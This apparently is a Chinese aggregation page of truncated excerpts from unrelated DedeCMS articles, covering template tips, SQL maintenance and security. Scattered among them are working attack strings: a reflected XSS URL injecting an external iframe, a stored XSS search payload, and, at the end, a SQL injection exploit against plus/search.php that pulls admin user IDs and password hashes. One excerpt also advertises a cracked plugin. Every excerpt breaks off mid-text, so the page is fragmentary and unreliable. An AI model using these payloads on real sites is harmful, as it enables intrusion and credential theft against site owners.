漏洞版本: dedecms织梦 v5.6 漏洞描述: DedeCMS内容管理系统软件采用XML名字空间风格核心模板:模板全部使用文件形式保存,对用户设计模板.网站升级转移均提供很大的便利,健壮的模板标签为站长DIY 自己的网站提供了强有力的支持.高效率标签缓存机制:允许对类同的标签进行缓存,在生成 HTML的时候,有利于提高系统反应速度,降低系统消耗的资源.模型与模块概念并存:在模型不能满足用户所有需求的情况下,DedeCMS推出一些互动的模块对系统进行补充,尽量满足用户的需求. demo1:h…

漏洞版本: dedecms织梦5.5 漏洞描述: 北洋贱队(http://bbs.seceye.org)首发 demo1:http://www.dedecms.com/plus/search.php?keyword=%22%3E%3Ciframe%20src=http://www.gohack.org%3E&searchtype=titlekeyword&channeltype=0&orderby=&kwtype=1&pagesize=10&typeid=0…

author:zzzhhh 一.        跨站漏洞 利用方法1,直接在搜索框处搜索<script>alert(/xss/)</script>//',再次刷新,跨站语句将被带入数据库,并直接在热门搜索处输出. 漏洞产生原因,因为未对输入变量进行编码,跨站语句未经转换直接存储入数据库中.见图1, 图1 二.代码分析先看index.php  53-54行代码是这么写的,javascript获取ID为search的input表单传参到tools.php文件中的seacher变量中..…

https://www.baidu.com/s?ie=utf-8&f=8&rsv_bp=1&tn=monline_3_dg&wd=dedecms 邮箱&oq=dedecms&rsv_pq=f743678800097d02&rsv_t=254bk22iTtSpWYZ0kMhIE0o/vcpsMkwJnGdOYi5j36jXehoxNI4i4ntaLR/CP/riex/C&rqlang=cn&rsv_enter=1&rsv_sug…

原文地址:浅析DEDECMS织梦留言板调用网站head.htm以及自定义的方法作者:it_wang 今天,一个客户朋友问到织梦留言板如何调用head.htm以及自定义,企业网站源码之前有摸索过,但是没有给大家发布出来,今天就全部总结如下: 1.找到dede管理目录下的catalog_do.php文件 else if($dopost=="guestbook") {     ShowMsg("正在跳转到留言本>>", "{$cfg_phpurl}/…

1.下载kindeditor,并解压到kindeditor目录,把kindeditor目录复制到dede的include目录下(ps:修改kindeditor-all-min.js.lang文件夹下zh-CN.js 两个文件名不修改文件路径是错的,kindeditor-min.js.zh_CN.js) 2.修改dede后台默认编辑器目录,在后台-系统-系统基本参数-核心参数,Html编辑器修改成kindeditor 并保存 3.给dedecms添加kindeditor编辑器调用代码 ,此处是ut…

dedecms织梦手机端文章内容页图片不能自适应解决方法: 方法一修改手机端文章页模板代码: 找到并打开手机端的文章内容页模板,将里面的{dede:field.body/}标签修改一下,改为如下的标签:{dede:field.body function="preg_replace('/style=.+?[*|\"]/i','', @me)"/}也就是通过php代码将文章内容里面的图片标签的宽度高度全部去掉,这样就可以了. 方法二修改CSS样式表: 找到图片节点对图片样式进行修…

dedecms织梦如何删除所有的文章?dede一键删除所有文章的SQL命令:  DELETE FROM dede_addonarticle WHERE aid >= 1 and aid<=200000; DELETE FROM dede_arctiny WHERE id >= 1 and id<=200000; DELETE FROM dede_archives WHERE id >= 1 and id<=200000;…

dedecms 织梦ping服务插件 最新破解可用版  ping_gbk.xml <module> <baseinfo> name=ping服务 team=井哥 time=2014-07-26 email=411161555@qq.com url=http://www.baidu.com hash=f8386d67d2a0abe1340f31168481c175 indexname= indexurl= ismember=0 autosetup=1 autodel=1 lang=g…

DEDECMS织梦 - 全站已有内容全部设置为动态化访问(包括自由列表freelist),以及发布内容时自动为动态化,设置分为三个步骤: 1.将所有文档设置为“仅动态”:执行以下mysql语句:update dede_archives set ismake=-1 2.将所有栏目设置为“使用动态页”,也可以更改栏目设置时选择“使用动态页”:执行以下mysql语句:update dede_arctype set isdefault=-1 3.首页动态:后台选择<生成>,然后点击<更新主页HT…

如果冯耀宗博客类似,首页调用文章列表,同时也有许多企业站需要调用文章列表,今天我与大家来分享一下dedecms织梦首页如何调用文章列表? {dede:arclist     row='16'  titlelen='50'  orderby ='pubdate'                  } [field:pubdate function="MyDate('m',@me)"/]月[field:pubdate function="MyDate('d',@me)"…

Dedecms织梦做站的时候,需要在当前页面调用顶级栏目名称的时候,织梦默认{dede:field name='typename' /} 可以获取当前栏目页上一级栏目的名称,而不是当前栏目顶级栏目名称. 下面这个方法可以实现这个效果: 在include/common.func.php的最下方加入: //获取顶级栏目名function GetTopTypename($id){global $dsql;$row = $dsql->GetOne("SELECT typename,topid FR…

2018年的中秋节即将来临,我们Sine安全公司,最近接到很多用dedecms程序的企业公司网站客户的反馈,说是公司网站经常被篡改,包括网站首页的标题内容以及描述内容,都被改成了什么北京赛车,北京PK10等等的彩票内容,而且大多数的网站客户都是从百度搜索关键词,点击进公司网站会被直接跳转到赌博网站上去. 对此我们Sine安全已经处理过很多像这样问题的客户网站,这种安全问题普遍的特征就是:频繁反复性质的篡改网站首页,重新在网站后台首页生成后,被篡改的内容就会清除,但没过多久就又被篡改了,使很多网站…

Dedecms(织梦)文章内容页和图片集内容页,调用缩略图的方法,亲测可用! Dedecms(织梦)首页的图片调用,相信大家已经非常的清楚,但是今天我在进行内容页的编写的时候,发现了内容页图片的调用问题! 这种问题,一般出现在产品站内页,因为会有产品缩略图的图片展示,所以今天我专门搜集了这方便的帖子! 为大家来解决这个问题,我想一定能帮助到大家! 好了话不多说,写内容先! 文章内容页和图片集内容页,缩略图的调用.适合内页中调用. <img src="{dede:field.picname …

网站迁移后,dedecms织梦系统后台验证码图片不显示的解决方法通用解决方案-取消后台验证码功能因为没有验证码,不能进后台,所以修改php文件源代码:方法一:打开dede/login.php 找到如下代码    if(($validate=='' || $validate != $svali) && preg_match("/6/",$safe_gdopen)){        ResetVdValue();        ShowMsg('验证码不正确!','logi…

用dedecms织梦程序如何做中英文网站,下面是一个详细的图文教程,希望能帮助到大家. 以下是用dedecms织梦程序制作过的一个5国语言网站,下面开始教程. 一.首先在后台建栏目,有三点需要注意 1.需要做几种语言就加几个大的栏目,我把这个栏目叫做封面栏目,里面都是自己语言的导航栏目 2.封面栏目“常规选项”的文件保存目录设置为cn或者en 3.封面栏目“高级选项”的列表模板设置为cn_index.htm或者en_index.htm 二.网站代码的调用 每种语言的封面栏目和每种语言下的导航栏目…

Dedecms织梦后台登陆验证码不显示几种解决方法,服务器所造成的验证码不显示问题看这里: 方法一:查看服务器的php版本是否与程序版本兼容(织梦程序PHP版本查看方法:打开www.96net.com.cn/include/common.inc.php文件找到如下代码 ,服务器PHP版本查看方法:直接打开浏览器查看),如果版本不一样那么就需要用到与服务器PHP相同版本的vdimgck.php文件来进行覆盖. 方法二:找到织梦程序data\safe\inc_safe_config.php文件,然后…

很多站长朋友反应,经常会遇到DEDECMS织梦后台更新网站栏目无反应和一键更新无响应的问题,这个问题的所在就是在于恢复了数据或者覆盖了织梦后台文件之后,点击一键更新完全没反应,或者生成栏目的时候其他都能过就是唯一在创建栏目这里就动不了,也不报错,也没有反应,其他小编遇到的是,到了某个栏目创建不了至少还会报错,但是唯一的这个也不报错,也没有反应,这种问题其实解决起来有点棘手,该如何解决呢,于是小编登录ftp去查看的时候其实栏目的文件夹其实已经是创建了的,就是唯一的是栏目的index.html没有生…

dedecms织梦建站后怎么防止被黑,加强安全漏洞措施? 很多人反映dedecms织梦网站被黑的情况,因为织梦相对来说漏洞还是挺多的,特别是新建设的站点,有些目录.文件该删的删,权限及安全都要设置,以防止被黑,下面赵一八笔记教大家怎么将dedecms的安全做到极致. 一.安全删除篇: 织梦的功能模块是很多的,对于一般企业而言,简单的文档发布就够用了,删除一些不用的模块是做好安全的第一步.可以删除的模块如下,请各位朋友按照需求删除.尤其是plus目录的一些文件,未用到的尽量删除,因为织梦历史上漏洞…

若需要学习技术文档共享(请关注群公告的内容)/讨论问题 请入QQ群:668345923 :若无法入群,请在您浏览文章下方留言,至于答复,这个看情况了 目录 HTTP协议详解 引言 一.HTTP协议详解之URL篇 二.HTTP协议详解之请求篇 三.HTTP协议详解之响应篇 四.HTTP协议详解之消息报头篇 五.利用telnet观察http协议的通讯过程 六.HTTP协议相关技术补充 利用HTTP host头攻击的技术 0x01 密码重置污染攻击 0x02 缓存污染 0x03 安全的配置 0x04…

最近项目部署的时候客户使用的绿盟扫描出一些漏洞,老大让我处理,经过看大神的博客等方式,分享一些简单的解决方法. 一 跨网站脚本 跨网站脚本(Cross-site scripting,通常简称为XSS或跨站脚本或跨站脚本攻击)是一种网站应用程序的安全漏洞攻击,是代码注入的一种.它允许恶意用户将代码注入到网页上,其他用户在观看网页时就会受到影响.这类攻击通常包含了HTML以及用户端脚本语言. XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击…

XSS跨站漏洞最终形成的原因是对输入与输出没有严格过滤. 1.输入与输出 在HTML中,<,>,",',&都有比较特殊的意义.HTML标签,属性就是由这几个符合组成的.PHP中提供了 htmlspecialchars().htmlentities()函数可以把一些预定的字符转换为HTML实体. &成为& "成为" '成为' <成为< 成为> 2.HttpOnly HttpOnly对防御XSS漏洞不起作用,主要是为了解决XS…

ecshop目前最新版本为4.0,是国内开源的一套商城系统,很多外贸公司,以及电商平台都在使用,正因为使用的人数较多,很多攻击者都在挖掘该网站的漏洞,就在最近ecshop被爆出高危漏洞,该漏洞利用跨站伪造函数,来对网站数据库进行攻击. ecshop 漏洞详情 该网站漏洞发生的根本原因是根目录下的user.php文件,在第315-365行里的代码里,该代码主要是处理用户注册,用户登录的一些功能请求处理,与数据库进行通信查询用户的账号密码是否正确,以及写入数据库中用户的注册资料等信息.我们使用一台w…

网站动静态转换 织梦后台--->系统--->系统设置--->SQL命令行工具 1.将网站所有栏目设置成动态页 update dede_arctype set isdefault=-1 还原成静态 update dede_arctype set isdefault=1 2.将网站所有文档都设置为动态页 update dede_archives set ismake=-1 还原成静态 update dede_archives set ismake=1 模板分割调用 {dede:include…

dede导航下拉菜单,一级栏目增加二级下拉菜单   使用dedecms5.6——5.7 将这段代码贴到templets\default\head.htm文件里<!-- //二级子类下拉菜单,考虑SEO原因放置于底部  --><script type='text/javascript' src='{dede:global.cfg_cmsurl/}/images/js/dropdown.js'></script>{dede:channelartlist typeid='to…

我们常用dedecms 自定义表单做留言功能.但是偶尔会遇到这样一个问题,就是 在前台提交表单后..后天显示不全.特别是中文字符  都不会显示, 比如下图: 这是因为  如果你织梦是gbk的话那就对了 是htmlspecialchars这个函数的原因 默认是utf8 如果不想换php版本的话就把htmlspecialchars($str);替换为htmlspecialchars($str, ENT_COMPAT ,'GB2312'); 所以 要在后台模板 wwww.baidu.com/dede/…

网站名称:{dede:global.cfg_webname/} 网站根网址:{dede:global.cfg_basehost/} 网站根目录:{dede:global.cfg_cmsurl/} 网页主页链接:{dede:global.cfg_indexurl/} 网站描述:{dede:global.cfg_description/} 网站关键字:{dede:global.cfg_keywords/} 模板路径:{dede:global.cfg_templets_skin/} 调用页面:{ded…

一.目录权限根据统计,绝大部分网站的攻击都在根目录开始的,因此,栏目目录不能设置在根目录.DEDECMS部署完成后,重点目录设置如下:1)将install删除.2) data.templets.uploads.a或html目录, 设置可读写,取消执行的权限(Windows如何设置目录的权限?):当然对于data文件夹还有更好的解决办法,那就是将data移出站点的根目录.3) 如果网站下不需要专题的,必须删除 special 目录.如果需要的话,有网友是这样建议的:生成HTML后,备份specia…

我们建站有时候需要直接把数据库导入,只要修改一下基本的名称信息就可以直接用,但是遇用到一些问题.比如文章摘要不会随着文章内容的更新而更新.织梦(dede)在添加文章的时候会自动生成文章摘要,如果重新修改文章内容比如我们替换一些基本的名词,摘要不会跟着更改,如果文章数量少我们可以手动修改. 如果文章太多有几百篇就太麻烦了.我们可以直接在数据库中修改,用sql语句UPDATE dede_description SET body = replace (body,'名词','名词') 更好的办法,下面我…

[通杀]dedecms plussearch.php 注入漏洞利用方式看结果如果提示Safe Alert: Request Error step 2 !那么直接用下面的exp查看源代码打印帮助1 /plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,3…